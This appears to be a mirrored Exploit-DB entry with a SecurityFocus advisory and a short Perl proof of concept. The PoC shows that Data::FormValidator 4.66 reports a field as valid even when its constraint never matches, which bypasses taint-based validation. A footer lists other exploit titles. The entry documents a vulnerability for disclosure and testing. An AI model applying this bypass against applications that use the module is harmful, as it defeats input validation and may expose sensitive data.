Perl Data::FormValidator 4.66 Module – ‘results()’ Security Bypass

Exploit Database
94 阅读

作者： dst

日期： 2011-06-08
类别：
- remote
平台：
- linux
来源：https://www.exploit-db.com/exploits/35836/

source: https://www.securityfocus.com/bid/48167/info

The Perl Data::FormValidator module is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.

Data::FormValidator 4.66 is vulnerable; other versions may also be affected.

#!/opt/perl/5.12/bin/perl

use strict;
use warnings;

use Data::FormValidator;

"some_unrelated_string" =~ m/^.*$/;

my $profile = {
untaint_all_constraints => 1,
required => [qw(a)],
constraint_methods => {
a => qr/will_never_match/,
},
};

my $results = Data::FormValidator->check({ a => 1 }, $profile);
warn $results->valid('a');

last Exploits
Perl Data::FormValidator 4.66 Module – ‘results()’ Security Bypass的更多信息

Qmail SMTP – Bash Environment Variable Injection (Metasploit)：
XBMC 9.04.1r20672 – ‘soap_action_name’ POST UPnP ‘sscanf’ Remote Buffer Overflow：
Apple Mac OSX Software Update – Command Execution (Metasploit)：
Tandberg E & EX & C Series Endpoints – Default Root Account Credentials：
Sambar Server 6 – Search Results Buffer Overflow (Metasploit)：
Bloodshed Dev-C++ 4.9.9.2 – Multiple EXE Loading Arbitrary Code Executions：
USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 – Remote Root Backdoor：
Axigen Webmail 1.0.1 – Directory Traversal：